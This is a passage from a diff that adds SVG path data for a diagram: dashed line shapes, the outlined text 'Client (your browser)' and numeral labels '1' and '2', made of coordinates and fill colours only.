L200.833333,311.939914 L200.833333,318.939914 L201.833333,318.939914 Z M201.833333,305.939914 L201.833333,298.939914 L200.833333,298.939914 L200.833333,305.939914 L201.833333,305.939914 Z M201.833333,292.939914 L201.833333,285.939914 L200.833333,285.939914 L200.833333,292.939914 L201.833333,292.939914 Z M201.833333,279.939914 L201.833333,272.939914 L200.833333,272.939914 L200.833333,279.939914 L201.833333,279.939914 Z M201.833333,266.939914 L201.833333,259.939914 L200.833333,259.939914 L200.833333,266.939914 L201.833333,266.939914 Z M201.833333,253.939914 L201.833333,246.939914 L200.833333,246.939914 L200.833333,253.939914 L201.833333,253.939914 Z M201.833333,240.939914 L201.833333,233.939914 L200.833333,233.939914 L200.833333,240.939914 L201.833333,240.939914 Z M201.833333,227.939914 L201.833333,220.939914 L200.833333,220.939914 L200.833333,227.939914 L201.833333,227.939914 Z M201.833333,214.939914 L201.833333,207.939914 L200.833333,207.939914 L200.833333,214.939914 L201.833333,214.939914 Z M201.833333,201.939914 L201.833333,194.939914 L200.833333,194.939914 L200.833333,201.939914 L201.833333,201.939914 Z M201.833333,188.939914 L201.833333,181.939914 L200.833333,181.939914 L200.833333,188.939914 L201.833333,188.939914 Z M201.833333,175.939914 L201.833333,168.939914 L200.833333,168.939914 L200.833333,175.939914 L201.833333,175.939914 Z M201.833333,162.939914 L201.833333,155.939914 L200.833333,155.939914 L200.833333,162.939914 L201.833333,162.939914 Z M201.833333,149.939914 L201.833333,142.939914 L200.833333,142.939914 L200.833333,149.939914 L201.833333,149.939914 Z M201.833333,136.939914 L201.833333,129.939914 L200.833333,129.939914 L200.833333,136.939914 L201.833333,136.939914 Z M201.833333,123.939914 L201.833333,116.939914 L200.833333,116.939914 L200.833333,123.939914 L201.833333,123.939914 Z M201.833333,110.939914 L201.833333,108.060086 L200.833333,108.060086 L200.833333,110.939914 L201.833333,110.939914 Z" id="Line-Copy-7" fill="#4E768D" fill-rule="nonzero"></path>
+            <path d="M1031.83333,890.939914 L1031.83333,883.939914 L1030.83333,883.939914 L1030.83333,890.939914 L1031.83333,890.939914 Z M1031.83333,877.939914 L1031.83333,870.939914 L1030.83333,870.939914 L1030.83333,877.939914 L1031.83333,877.939914 Z M1031.83333,864.939914 L1031.83333,857.939914 L1030.83333,857.939914 L1030.83333,864.939914 L1031.83333,864.939914 Z M1031.83333,851.939914 L1031.83333,844.939914 L1030.83333,844.939914 L1030.83333,851.939914 L1031.83333,851.939914 Z M1031.83333,838.939914 L1031.83333,831.939914 L1030.83333,831.939914 L1030.83333,838.939914 L1031.83333,838.939914 Z M1031.83333,825.939914 L1031.83333,818.939914 L1030.83333,818.939914 L1030.83333,825.939914 L1031.83333,825.939914 Z M1031.83333,812.939914 L1031.83333,805.939914 L1030.83333,805.939914 L1030.83333,812.939914 L1031.83333,812.939914 Z M1031.83333,799.939914 L1031.83333,792.939914 L1030.83333,792.939914 L1030.83333,799.939914 L1031.83333,799.939914 Z M1031.83333,786.939914 L1031.83333,779.939914 L1030.83333,779.939914 L1030.83333,786.939914 L1031.83333,786.939914 Z M1031.83333,773.939914 L1031.83333,766.939914 L1030.83333,766.939914 L1030.83333,773.939914 L1031.83333,773.939914 Z M1031.83333,760.939914 L1031.83333,753.939914 L1030.83333,753.939914 L1030.83333,760.939914 L1031.83333,760.939914 Z M1031.83333,747.939914 L1031.83333,740.939914 L1030.83333,740.939914 L1030.83333,747.939914 L1031.83333,747.939914 Z M1031.83333,734.939914 L1031.83333,727.939914 L1030.83333,727.939914 L1030.83333,734.939914 L1031.83333,734.939914 Z M1031.83333,721.939914 L1031.83333,714.939914 L1030.83333,714.939914 L1030.83333,721.939914 L1031.83333,721.939914 Z M1031.83333,708.939914 L1031.83333,701.939914 L1030.83333,701.939914 L1030.83333,708.939914 L1031.83333,708.939914 Z M1031.83333,695.939914 L1031.83333,688.939914 L1030.83333,688.939914 L1030.83333,695.939914 L1031.83333,695.939914 Z M1031.83333,682.939914 L1031.83333,675.939914 L1030.83333,675.939914 L1030.83333,682.939914 L1031.83333,682.939914 Z M1031.83333,669.939914 L1031.83333,662.939914 L1030.83333,662.939914 L1030.83333,669.939914 L1031.83333,669.939914 Z M1031.83333,656.939914 L1031.83333,649.939914 L1030.83333,649.939914 L1030.83333,656.939914 L1031.83333,656.939914 Z M1031.83333,643.939914 L1031.83333,636.939914 L1030.83333,636.939914 L1030.83333,643.939914 L1031.83333,643.939914 Z M1031.83333,630.939914 L1031.83333,623.939914 L1030.83333,623.939914 L1030.83333,630.939914 L1031.83333,630.939914 Z M1031.83333,617.939914 L1031.83333,610.939914 L1030.83333,610.939914 L1030.83333,617.939914 L1031.83333,617.939914 Z M1031.83333,604.939914 L1031.83333,597.939914 L1030.83333,597.939914 L1030.83333,604.939914 L1031.83333,604.939914 Z M1031.83333,591.939914 L1031.83333,584.939914 L1030.83333,584.939914 L1030.83333,591.939914 L1031.83333,591.939914 Z M1031.83333,578.939914 L1031.83333,571.939914 L1030.83333,571.939914 L1030.83333,578.939914 L1031.83333,578.939914 Z M1031.83333,565.939914 L1031.83333,558.939914 L1030.83333,558.939914 L1030.83333,565.939914 L1031.83333,565.939914 Z M1031.83333,552.939914 L1031.83333,545.939914 L1030.83333,545.939914 L1030.83333,552.939914 L1031.83333,552.939914 Z M1031.83333,539.939914 L1031.83333,532.939914 L1030.83333,532.939914 L1030.83333,539.939914 L1031.83333,539.939914 Z M1031.83333,526.939914 L1031.83333,519.939914 L1030.83333,519.939914 L1030.83333,526.939914 L1031.83333,526.939914 Z M1031.83333,513.939914 L1031.83333,506.939914 L1030.83333,506.939914 L1030.83333,513.939914 L1031.83333,513.939914 Z M1031.83333,500.939914 L1031.83333,493.939914 L1030.83333,493.939914 L1030.83333,500.939914 L1031.83333,500.939914 Z M1031.83333,487.939914 L1031.83333,480.939914 L1030.83333,480.939914 L1030.83333,487.939914 L1031.83333,487.939914 Z M1031.83333,474.939914 L1031.83333,467.939914 L1030.83333,467.939914 L1030.83333,474.939914 L1031.83333,474.939914 Z M1031.83333,461.939914 L1031.83333,454.939914 L1030.83333,454.939914 L1030.83333,461.939914 L1031.83333,461.939914 Z M1031.83333,448.939914 L1031.83333,441.939914 L1030.83333,441.939914 L1030.83333,448.939914 L1031.83333,448.939914 Z M1031.83333,435.939914 L1031.83333,428.939914 L1030.83333,428.939914 L1030.83333,435.939914 L1031.83333,435.939914 Z M1031.83333,422.939914 L1031.83333,415.939914 L1030.83333,415.939914 L1030.83333,422.939914 L1031.83333,422.939914 Z M1031.83333,409.939914 L1031.83333,402.939914 L1030.83333,402.939914 L1030.83333,409.939914 L1031.83333,409.939914 Z M1031.83333,396.939914 L1031.83333,389.939914 L1030.83333,389.939914 L1030.83333,396.939914 L1031.83333,396.939914 Z M1031.83333,383.939914 L1031.83333,376.939914 L1030.83333,376.939914 L1030.83333,383.939914 L1031.83333,383.939914 Z M1031.83333,370.939914 L1031.83333,363.939914 L1030.83333,363.939914 L1030.83333,370.939914 L1031.83333,370.939914 Z M1031.83333,357.939914 L1031.83333,350.939914 L1030.83333,350.939914 L1030.83333,357.939914 L1031.83333,357.939914 Z M1031.83333,344.939914 L1031.83333,337.939914 L1030.83333,337.939914 L1030.83333,344.939914 L1031.83333,344.939914 Z M1031.83333,331.939914 L1031.83333,324.939914 L1030.83333,324.939914 L1030.83333,331.939914 L1031.83333,331.939914 Z M1031.83333,318.939914 L1031.83333,311.939914 L1030.83333,311.939914 L1030.83333,318.939914 L1031.83333,318.939914 Z M1031.83333,305.939914 L1031.83333,298.939914 L1030.83333,298.939914 L1030.83333,305.939914 L1031.83333,305.939914 Z M1031.83333,292.939914 L1031.83333,285.939914 L1030.83333,285.939914 L1030.83333,292.939914 L1031.83333,292.939914 Z M1031.83333,279.939914 L1031.83333,272.939914 L1030.83333,272.939914 L1030.83333,279.939914 L1031.83333,279.939914 Z M1031.83333,266.939914 L1031.83333,259.939914 L1030.83333,259.939914 L1030.83333,266.939914 L1031.83333,266.939914 Z M1031.83333,253.939914 L1031.83333,246.939914 L1030.83333,246.939914 L1030.83333,253.939914 L1031.83333,253.939914 Z M1031.83333,240.939914 L1031.83333,233.939914 L1030.83333,233.939914 L1030.83333,240.939914 L1031.83333,240.939914 Z M1031.83333,227.939914 L1031.83333,220.939914 L1030.83333,220.939914 L1030.83333,227.939914 L1031.83333,227.939914 Z M1031.83333,214.939914 L1031.83333,207.939914 L1030.83333,207.939914 L1030.83333,214.939914 L1031.83333,214.939914 Z M1031.83333,201.939914 L1031.83333,194.939914 L1030.83333,194.939914 L1030.83333,201.939914 L1031.83333,201.939914 Z M1031.83333,188.939914 L1031.83333,181.939914 L1030.83333,181.939914 L1030.83333,188.939914 L1031.83333,188.939914 Z M1031.83333,175.939914 L1031.83333,168.939914 L1030.83333,168.939914 L1030.83333,175.939914 L1031.83333,175.939914 Z M1031.83333,162.939914 L1031.83333,155.939914 L1030.83333,155.939914 L1030.83333,162.939914 L1031.83333,162.939914 Z M1031.83333,149.939914 L1031.83333,142.939914 L1030.83333,142.939914 L1030.83333,149.939914 L1031.83333,149.939914 Z M1031.83333,136.939914 L1031.83333,129.939914 L1030.83333,129.939914 L1030.83333,136.939914 L1031.83333,136.939914 Z M1031.83333,123.939914 L1031.83333,116.939914 L1030.83333,116.939914 L1030.83333,123.939914 L1031.83333,123.939914 Z M1031.83333,110.939914 L1031.83333,108.060086 L1030.83333,108.060086 L1030.83333,110.939914 L1031.83333,110.939914 Z" id="Line-Copy-8" fill="#4E768D" fill-rule="nonzero"></path>
+            <path d="M182.397695,63.2246094 C181.284409,63.2246094 180.29158,63.0341816 179.41918,62.6533203 C178.54678,62.272459 177.835524,61.743493 177.285391,61.0664062 C176.735258,60.3893195 176.318595,59.5950566 176.035391,58.6835938 C175.752186,57.7721309 175.610586,56.7727919 175.610586,55.6855469 C175.610586,54.2402271 175.875883,52.9593155 176.406484,51.8427734 C176.937086,50.7262314 177.729721,49.8424512 178.784414,49.1914062 C179.839107,48.5403613 181.085839,48.2148438 182.524648,48.2148438 C184.106688,48.2148438 185.45433,48.5468717 186.567617,49.2109375 L185.971914,50.1777344 C184.956284,49.5657521 183.810462,49.2597656 182.534414,49.2597656 C181.642483,49.2597656 180.841709,49.4274072 180.13207,49.7626953 C179.422431,50.0979834 178.841383,50.561846 178.388906,51.1542969 C177.93643,51.7467478 177.591381,52.4335898 177.35375,53.2148438 C177.116119,53.9960977 176.997305,54.8424434 176.997305,55.7539062 C176.997305,56.6458378 177.106353,57.4710249 177.324453,58.2294922 C177.542553,58.9879595 177.871326,59.6650361 178.310781,60.2607422 C178.750237,60.8564483 179.334541,61.3251936 180.063711,61.6669922 C180.792881,62.0087908 181.632717,62.1796875 182.583242,62.1796875 C183.605383,62.1796875 184.744694,61.8964872 186.001211,61.3300781 L186.255117,62.3359375 C185.304592,62.9283884 184.018797,63.2246094 182.397695,63.2246094 Z M191.977695,63.2246094 C191.079253,63.2246094 190.421708,63.0211609 190.005039,62.6142578 C189.58837,62.2073547 189.380039,61.5449265 189.380039,60.6269531 L189.380039,48.1367188 L190.571445,48.0390625 L190.571445,60.5585938 C190.571445,61.2096387 190.690259,61.6588529 190.927891,61.90625 C191.165522,62.1536471 191.525219,62.2773438 192.006992,62.2773438 C192.397619,62.2773438 192.885896,62.2024747 193.471836,62.0527344 L193.520664,62.9902344 C192.88264,63.1464852 192.368322,63.2246094 191.977695,63.2246094 Z M195.913164,63 L195.913164,52.296875 L197.133867,52.296875 L197.133867,63 L195.913164,63 Z M195.913164,50.109375 L195.913164,48.46875 L197.124102,48.46875 L197.124102,50.109375 L195.913164,50.109375 Z M205.297852,63.234375 C203.81998,63.234375 202.646489,62.7395883 201.777344,61.75 C200.908199,60.7604117 200.473633,59.4192793 200.473633,57.7265625 C200.473633,56.0924397 200.898433,54.7545625 201.748047,53.7128906 C202.59766,52.6712188 203.696282,52.1341147 205.043945,52.1015625 C206.300462,52.1015625 207.309567,52.5507768 208.071289,53.4492188 C208.833012,54.3476607 209.213867,55.5520758 209.213867,57.0625 C209.213867,57.121094 209.21224,57.239908 209.208984,57.4189453 C209.205729,57.5979827 209.204102,57.7233069 209.204102,57.7949219 L201.75293,57.7949219 C201.765951,59.1686267 202.097979,60.257483 202.749023,61.0615234 C203.400068,61.8655639 204.259435,62.2675781 205.327148,62.2675781 C206.023767,62.2675781 206.629229,62.1861987 207.143555,62.0234375 C207.65788,61.8606763 208.194984,61.6295588 208.754883,61.3300781 L208.959961,62.2382812 C207.879226,62.9023471 206.658535,63.234375 205.297852,63.234375 Z M201.801758,56.8183594 L207.895508,56.8183594 C207.895508,55.6269472 207.638349,54.7138704 207.124023,54.0791016 C206.609698,53.4443328 205.903325,53.1269531 205.004883,53.1269531 C204.09342,53.1269531 203.35775,53.4654914 202.797852,54.1425781 C202.237953,54.8196648 201.905925,55.711583 201.801758,56.8183594 Z M212.465742,63 L212.465742,52.296875 L213.52043,52.296875 L213.686445,53.9472656 C214.070562,53.3743461 214.586507,52.9235042 215.234297,52.5947266 C215.882087,52.2659489 216.580322,52.1015625 217.329023,52.1015625 C218.559498,52.1015625 219.464437,52.4401008 220.043867,53.1171875 C220.623297,53.7942742 220.913008,54.8749926 220.913008,56.359375 L220.913008,63 L219.692305,63 L219.692305,55.8125 C219.659752,54.8619744 219.457932,54.1783875 219.086836,53.7617188 C218.71574,53.34505 218.107022,53.1367188 217.260664,53.1367188 C216.290607,53.1367188 215.497972,53.3808569 214.882734,53.8691406 C214.267497,54.3574243 213.881759,54.9889284 213.725508,55.7636719 C213.699466,56.069663 213.686445,56.3886702 213.686445,56.7207031 L213.686445,63 L212.465742,63 Z M227.56332,63.2246094 C226.664878,63.2246094 226.007333,63.0211609 225.590664,62.6142578 C225.173995,62.2073547 224.965664,61.5449265 224.965664,60.6269531 L224.965664,53.1855469 L223.451992,53.1855469 L223.539883,52.453125 L224.985195,52.3164062 L225.307461,49.8652344 L226.15707,49.8066406 L226.15707,52.296875 L229.28207,52.296875 L229.28207,53.1855469 L226.15707,53.1855469 L226.15707,60.3730469 C226.15707,61.128259 226.280767,61.6344388 226.528164,61.8916016 C226.775561,62.1487643 227.211755,62.2773438 227.836758,62.2773438 C228.240406,62.2773438 228.741703,62.2024747 229.340664,62.0527344 L229.389492,62.9902344 C228.601728,63.1464852 227.99301,63.2246094 227.56332,63.2246094 Z M136.934141,91.3339844 C136.107314,90.1881453 135.459534,88.8697991 134.990781,87.3789062 C134.522029,85.8880134 134.287656,84.3873773 134.287656,82.8769531 C134.287656,79.7258957 135.160043,76.8385548 136.904844,74.2148438 L138.066953,74.2148438 C137.15549,75.7578202 136.515848,77.2031183 136.148008,78.5507812 C135.780168,79.8984442 135.59625,81.3209561 135.59625,82.8183594 C135.59625,85.754572 136.41981,88.5930853 138.066953,91.3339844 L136.934141,91.3339844 Z M140.781719,94.078125 C140.50828,94.078125 140.23159,94.0520836 139.951641,94 L139.86375,93.0039062 C139.883281,93.0039062 139.979309,93.008789 140.151836,93.0185547 C140.324363,93.0283204 140.452942,93.0332031 140.537578,93.0332031 C141.357895,93.0332031 141.973123,92.8932306 142.383281,92.6132812 C142.79344,92.3333319 143.158019,91.7864624 143.477031,90.9726562 C143.516094,90.8619786 143.618632,90.5820335 143.784649,90.1328125 C143.950665,89.6835915 144.079244,89.3287773 144.170391,89.0683594 L139.893047,78.296875 L141.162578,78.296875 L144.805156,87.9257812 L145.244609,86.578125 C147.034983,80.9856491 147.952943,78.1927083 147.998516,78.1992188 C148.005026,78.1992188 148.001771,78.2317705 147.98875,78.296875 L149.258281,78.296875 C146.406705,86.311238 144.915834,90.5039044 144.785625,90.875 C144.336404,91.9557346 143.809066,92.759763 143.203594,93.2871094 C142.598122,93.8144558 141.790838,94.078125 140.781719,94.078125 Z M156.045313,88.2675781 C156.826566,88.2675781 157.48574,88.0608745 158.022852,87.6474609 C158.559964,87.2340474 158.950585,86.6888055 159.194727,86.0117188 C159.438868,85.334632 159.560938,84.556645 159.560938,83.6777344 C159.560938,82.2975191 159.267972,81.1875042 158.682031,80.3476562 C158.096091,79.5078083 157.204173,79.0878906 156.00625,79.0878906 C155.224996,79.0878906 154.559313,79.2978495 154.00918,79.7177734 C153.459047,80.1376974 153.057033,80.6878221 152.803125,81.3681641 C152.549218,82.048506 152.422266,82.8281206 152.422266,83.7070312 C152.422266,85.0416733 152.733135,86.1354124 153.354883,86.9882812 C153.976631,87.8411501 154.873432,88.2675781 156.045313,88.2675781 Z M155.957422,89.234375 C154.987365,89.234375 154.132881,88.9902368 153.393945,88.5019531 C152.655009,88.0136694 152.091864,87.3512412 151.704492,86.5146484 C151.317121,85.6780557 151.123438,84.7324271 151.123438,83.6777344 C151.123438,82.8834596 151.235741,82.1461623 151.460352,81.4658203 C151.684962,80.7854784 152.005597,80.1962916 152.422266,79.6982422 C152.838934,79.2001928 153.356507,78.8095717 153.975,78.5263672 C154.593493,78.2431626 155.280335,78.1015625 156.035547,78.1015625 C157.038156,78.1015625 157.907288,78.3473283 158.642969,78.8388672 C159.37865,79.3304061 159.930402,79.9912068 160.298242,80.8212891 C160.666083,81.6513713 160.85,82.5969999 160.85,83.6582031 C160.85,84.7259168 160.6612,85.6764281 160.283594,86.5097656 C159.905988,87.3431031 159.342842,88.0055314 158.594141,88.4970703 C157.845439,88.9886092 156.966542,89.234375 155.957422,89.234375 Z M168.047188,89.2636719 C167.487289,89.2636719 166.968088,89.2001959 166.48957,89.0732422 C166.011052,88.9462884 165.566721,88.7477227 165.156563,88.4775391 C164.746404,88.2073554 164.422514,87.8248723 164.184883,87.3300781 C163.947251,86.835284 163.828438,86.2526075 163.828438,85.5820312 L163.828438,78.296875 L165.039375,78.296875 L165.039375,85.6113281 C165.039375,86.1191432 165.117499,86.5488264 165.27375,86.9003906 C165.430001,87.2519549 165.654608,87.5172517 165.947578,87.6962891 C166.240548,87.8753264 166.553045,88.0006507 166.885078,88.0722656 C167.217111,88.1438806 167.604477,88.1796875 168.047188,88.1796875 C168.483388,88.1796875 168.867498,88.142253 169.199531,88.0673828 C169.531564,87.9925126 169.840806,87.8639332 170.127266,87.6816406 C170.413725,87.499348 170.63345,87.2340512 170.786445,86.8857422 C170.939441,86.5374332 171.015938,86.1126327 171.015938,85.6113281 L171.015938,78.296875 L172.226875,78.296875 L172.226875,85.5820312 C172.226875,86.128909 172.148751,86.6171854 171.9925,87.046875 C171.836249,87.4765646 171.627918,87.8281236 171.3675,88.1015625 C171.107082,88.3750014 170.792958,88.6012361 170.425117,88.7802734 C170.057277,88.9593108 169.679676,89.0846351 169.292305,89.15625 C168.904933,89.2278649 168.489898,89.2636719 168.047188,89.2636719 Z M175.713125,89 C175.700104,82.7174165 175.693594,79.1497438 175.693594,78.296875 L176.689688,78.296875 L176.767813,80.40625 C177.151929,79.768226 177.640205,79.2473979 178.232656,78.84375 C178.825107,78.4401021 179.443591,78.2382812 180.088125,78.2382812 C180.355053,78.2382812 180.641509,78.2610675 180.9475,78.3066406 L180.859609,79.3125 C180.625233,79.2734373 180.37784,79.2539062 180.117422,79.2539062 C179.212469,79.2539062 178.452386,79.610348 177.837148,80.3232422 C177.221911,81.0361364 176.914297,81.8808545 176.914297,82.8574219 L176.914297,89 L175.713125,89 Z M193.466875,89.234375 C192.015045,89.234375 190.859457,88.6386778 190.000078,87.4472656 L189.873125,89 L188.8575,89 L188.8575,74.1464844 L190.058672,74.0390625 L190.058672,77.6425781 C190.058672,78.742844 190.048906,79.5013 190.029375,79.9179688 C190.426512,79.3059865 190.932692,78.8502619 191.54793,78.5507812 C192.163167,78.2513006 192.802809,78.1015625 193.466875,78.1015625 C194.912195,78.1015625 196.040113,78.6175079 196.850664,79.6494141 C197.661215,80.6813203 198.066484,82.0110596 198.066484,83.6386719 C198.066484,84.7324273 197.898843,85.6943318 197.563555,86.5244141 C197.228267,87.3544963 196.709066,88.0136694 196.005938,88.5019531 C195.302809,88.9902368 194.456463,89.234375 193.466875,89.234375 Z M193.525469,88.2675781 C194.12443,88.2675781 194.643631,88.1389987 195.083086,87.8818359 C195.522541,87.6246732 195.86108,87.2731142 196.098711,86.8271484 C196.336342,86.3811827 196.508867,85.8994167 196.616289,85.3818359 C196.723711,84.8642552 196.777422,84.3027374 196.777422,83.6972656 C196.777422,83.2154924 196.746498,82.7613954 196.684648,82.3349609 C196.622799,81.9085265 196.512123,81.491864 196.352617,81.0849609 C196.193111,80.6780579 195.994545,80.3313816 195.756914,80.0449219 C195.519283,79.7584621 195.210041,79.5273446 194.82918,79.3515625 C194.448318,79.1757804 194.013752,79.0878906 193.525469,79.0878906 C192.399161,79.0878906 191.538167,79.49316 190.942461,80.3037109 C190.346755,81.1142619 190.052161,82.2649665 190.058672,83.7558594 C190.058672,84.4394565 190.122148,85.049802 190.249102,85.5869141 C190.376055,86.1240261 190.574621,86.5960266 190.844805,87.0029297 C191.114988,87.4098328 191.474685,87.7223296 191.923906,87.9404297 C192.373127,88.1585297 192.906976,88.2675781 193.525469,88.2675781 Z M201.298828,89 C201.285807,82.7174165 201.279297,79.1497438 201.279297,78.296875 L202.275391,78.296875 L202.353516,80.40625 C202.737632,79.768226 203.225908,79.2473979 203.818359,78.84375 C204.41081,78.4401021 205.029294,78.2382812 205.673828,78.2382812 C205.940757,78.2382812 206.227212,78.2610675 206.533203,78.3066406 L206.445312,79.3125 C206.210936,79.2734373 205.963543,79.2539062 205.703125,79.2539062 C204.798173,79.2539062 204.038089,79.610348 203.422852,80.3232422 C202.807614,81.0361364 202.5,81.8808545 202.5,82.8574219 L202.5,89 L201.298828,89 Z M213.339766,88.2675781 C214.12102,88.2675781 214.780193,88.0608745 215.317305,87.6474609 C215.854417,87.2340474 216.245038,86.6888055 216.48918,86.0117188 C216.733322,85.334632 216.855391,84.556645 216.855391,83.6777344 C216.855391,82.2975191 216.562425,81.1875042 215.976484,80.3476562 C215.390544,79.5078083 214.498626,79.0878906 213.300703,79.0878906 C212.519449,79.0878906 211.853766,79.2978495 211.303633,79.7177734 C210.7535,80.1376974 210.351486,80.6878221 210.097578,81.3681641 C209.843671,82.048506 209.716719,82.8281206 209.716719,83.7070312 C209.716719,85.0416733 210.027588,86.1354124 210.649336,86.9882812 C211.271084,87.8411501 212.167885,88.2675781 213.339766,88.2675781 Z M213.251875,89.234375 C212.281818,89.234375 211.427334,88.9902368 210.688398,88.5019531 C209.949462,88.0136694 209.386317,87.3512412 208.998945,86.5146484 C208.611574,85.6780557 208.417891,84.7324271 208.417891,83.6777344 C208.417891,82.8834596 208.530194,82.1461623 208.754805,81.4658203 C208.979415,80.7854784 209.30005,80.1962916 209.716719,79.6982422 C210.133387,79.2001928 210.65096,78.8095717 211.269453,78.5263672 C211.887946,78.2431626 212.574788,78.1015625 213.33,78.1015625 C214.332609,78.1015625 215.201741,78.3473283 215.937422,78.8388672 C216.673103,79.3304061 217.224855,79.9912068 217.592695,80.8212891 C217.960536,81.6513713 218.144453,82.5969999 218.144453,83.6582031 C218.144453,84.7259168 217.955653,85.6764281 217.578047,86.5097656 C217.200441,87.3431031 216.637295,88.0055314 215.888594,88.4970703 C215.139892,88.9886092 214.260995,89.234375 213.251875,89.234375 Z M222.978359,89 L219.990078,78.296875 L221.259609,78.296875 L223.730312,87.8574219 C225.507665,82.1412475 226.500494,78.9544304 226.708828,78.296875 L228.193203,78.296875 C230.139827,84.6510734 231.12289,87.828125 231.142422,87.828125 L233.505703,78.296875 L234.765469,78.296875 L231.826016,89 L230.419766,89 C230.400234,89.0065104 229.941254,87.5058744 229.042812,84.4980469 C228.14437,81.4902193 227.623542,79.7226589 227.480312,79.1953125 C227.402187,79.5468768 227.105966,80.5380778 226.591641,82.1689453 C226.077315,83.7998128 225.582528,85.3476489 225.107266,86.8125 C224.632003,88.2773511 224.39112,89.0065104 224.384609,89 L222.978359,89 Z M240.370859,89.2441406 C239.680752,89.2441406 239.032972,89.1595061 238.4275,88.9902344 C237.822028,88.8209627 237.343517,88.6191418 236.991953,88.3847656 L237.167734,87.3691406 C238.241958,87.9290393 239.270594,88.2089844 240.253672,88.2089844 C242.018004,88.2089844 242.932708,87.554694 242.997812,86.2460938 C242.997812,85.699216 242.820405,85.2695328 242.465586,84.9570312 C242.110766,84.6445297 241.39951,84.3190121 240.331797,83.9804688 C239.771898,83.7851553 239.462656,83.6777345 239.404062,83.6582031 C237.730877,83.1503881 236.887786,82.2487044 236.874766,80.953125 C236.874766,80.2044233 237.205166,79.5419951 237.865977,78.9658203 C238.526787,78.3896456 239.420333,78.1015625 240.546641,78.1015625 C241.672948,78.1015625 242.73088,78.3229145 243.720469,78.765625 L243.310312,79.6640625 C242.307703,79.2864564 241.376723,79.0976562 240.517344,79.0976562 C239.762132,79.0976562 239.168062,79.2669254 238.735117,79.6054688 C238.302172,79.9440121 238.085703,80.3997367 238.085703,80.9726562 C238.085703,81.4544295 238.227303,81.8238919 238.510508,82.0810547 C238.793712,82.3382174 239.35523,82.5839832 240.195078,82.8183594 C240.286224,82.8444012 240.453866,82.9029943 240.698008,82.9941406 C240.94215,83.0852869 241.077239,83.1341146 241.103281,83.140625 C242.229589,83.4856788 243.015714,83.8942034 243.46168,84.3662109 C243.907645,84.8382185 244.130625,85.4811157 244.130625,86.2949219 C244.111094,87.2324266 243.761162,87.9583308 243.08082,88.4726562 C242.400478,88.9869817 241.497167,89.2441406 240.370859,89.2441406 Z M251.630547,89.234375 C250.152675,89.234375 248.979184,88.7395883 248.110039,87.75 C247.240894,86.7604117 246.806328,85.4192793 246.806328,83.7265625 C246.806328,82.0924397 247.231128,80.7545625 248.080742,79.7128906 C248.930356,78.6712188 250.028978,78.1341147 251.376641,78.1015625 C252.633157,78.1015625 253.642262,78.5507768 254.403984,79.4492188 C255.165707,80.3476607 255.546562,81.5520758 255.546562,83.0625 C255.546562,83.121094 255.544935,83.239908 255.54168,83.4189453 C255.538424,83.5979827 255.536797,83.7233069 255.536797,83.7949219 L248.085625,83.7949219 C248.098646,85.1686267 248.430674,86.257483 249.081719,87.0615234 C249.732764,87.8655639 250.59213,88.2675781 251.659844,88.2675781 C252.356462,88.2675781 252.961924,88.1861987 253.47625,88.0234375 C253.990575,87.8606763 254.527679,87.6295588 255.087578,87.3300781 L255.292656,88.2382812 C254.211922,88.9023471 252.991231,89.234375 251.630547,89.234375 Z M248.134453,82.8183594 L254.228203,82.8183594 C254.228203,81.6269472 253.971044,80.7138704 253.456719,80.0791016 C252.942393,79.4443328 252.23602,79.1269531 251.337578,79.1269531 C250.426115,79.1269531 249.690445,79.4654914 249.130547,80.1425781 C248.570648,80.8196648 248.23862,81.711583 248.134453,82.8183594 Z M258.817969,89 C258.804948,82.7174165 258.798437,79.1497438 258.798437,78.296875 L259.794531,78.296875 L259.872656,80.40625 C260.256773,79.768226 260.745049,79.2473979 261.3375,78.84375 C261.929951,78.4401021 262.548434,78.2382812 263.192969,78.2382812 C263.459897,78.2382812 263.746353,78.2610675 264.052344,78.3066406 L263.964453,79.3125 C263.730077,79.2734373 263.482684,79.2539062 263.222266,79.2539062 C262.317313,79.2539062 261.55723,79.610348 260.941992,80.3232422 C260.326755,81.0361364 260.019141,81.8808545 260.019141,82.8574219 L260.019141,89 L258.817969,89 Z M266.103047,91.3339844 C267.75019,88.5865748 268.57375,85.7480615 268.57375,82.8183594 C268.57375,81.3274665 268.388205,79.9065823 268.017109,78.5556641 C267.646014,77.2047458 267.004744,75.7578202 266.093281,74.2148438 L267.245625,74.2148438 C269.003446,76.8841279 269.882344,79.7714688 269.882344,82.8769531 C269.882344,84.3938878 269.646343,85.8928962 269.174336,87.3740234 C268.702328,88.8551506 268.052921,90.1751244 267.226094,91.3339844 L266.103047,91.3339844 Z" id="Client-(your-browser" fill="#D3DDE2"></path>
+            <path d="M1125.20317,432 L1125.20317,416.109375 C1124.95317,416.289063 1124.55669,416.511717 1124.01372,416.777344 C1123.47075,417.04297 1122.92974,417.26953 1122.39067,417.457031 L1122.39067,416.191406 C1124.03131,415.43359 1125.05864,414.890627 1125.4727,414.5625 L1126.70317,414.5625 L1126.70317,432 L1125.20317,432 Z" id="1" fill="#52B1DB"></path>
+            <path d="M1120.34575,749 L1119.99419,747.511719 L1126.07622,740.433594 C1126.8731,739.488277 1127.46684,738.666019 1127.85747,737.966797 C1128.2481,737.267575 1128.44341,736.585941 1128.44341,735.921875 C1128.44341,734.812494 1128.18169,733.962894 1127.65825,733.373047 C1127.13481,732.7832 1126.35357,732.488281 1125.3145,732.488281 C1124.57231,732.488281 1123.8438,732.599608 1123.12895,732.822266 C1122.41411,733.044923 1121.83013,733.371092 1121.377,733.800781 L1120.82622,732.664062 C1121.80279,731.726558 1123.3184,731.257812 1125.37309,731.257812 C1126.86529,731.257812 1128.04301,731.667965 1128.9063,732.488281 C1129.76958,733.308598 1130.20122,734.386712 1130.20122,735.722656 C1130.20122,736.621098 1129.97271,737.505855 1129.51567,738.376953 C1129.05864,739.248051 1128.30669,740.289056 1127.25981,741.5 L1121.98638,747.558594 L1130.34184,747.558594 L1130.24809,749 L1120.34575,749 Z" id="2" fill="#52B1DB"></path>
